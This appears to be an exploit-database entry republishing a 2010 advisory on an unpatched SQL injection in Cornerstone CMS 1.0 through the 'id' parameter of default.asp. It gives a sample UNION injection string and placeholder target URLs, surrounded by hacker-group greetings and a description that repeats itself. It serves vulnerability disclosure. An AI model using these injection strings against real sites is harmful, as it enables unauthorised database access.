Cornerstone CMS SQL Injection Vulnerability

vendor:

Cornerstone CMS

by:

Th3 RDX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Cornerstone CMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:cs-tech:cornerstone_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Demo Site

2010

Cornerstone CMS SQL Injection Vulnerability

Cornerstone CMS is vulnerable to SQL Injection. Attackers can inject malicious SQL queries via the 'id' parameter in the default.asp page. The vulnerable parameters are 'id' in default.asp page. An attacker can inject malicious SQL queries via the 'id' parameter in the default.asp page. The vulnerable parameters are 'id' in default.asp page. An attacker can inject malicious SQL queries via the 'id' parameter in the default.asp page.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Cornerstone CMS SQL Injection Vulnerability
# Date: 22-06-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.0
# Tested on: Demo Site
# category: webapp
# Code :

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky(www.indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Cornerstone CMS SQL Injection Vulnerability

----- [ Vendor ] -----

http://www.cs-tech.com/

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code

{e.g = default.asp?id=60+and+1=0+ Union 2,3,4,5,6,7,8,9,10 (tables & column) }

[SQLi] http://server/cs-cms/default.asp?id=70[CODE]

[SQLi] http://server/cs-cms/default.asp?id=44[CODE]

%\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 22 June 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=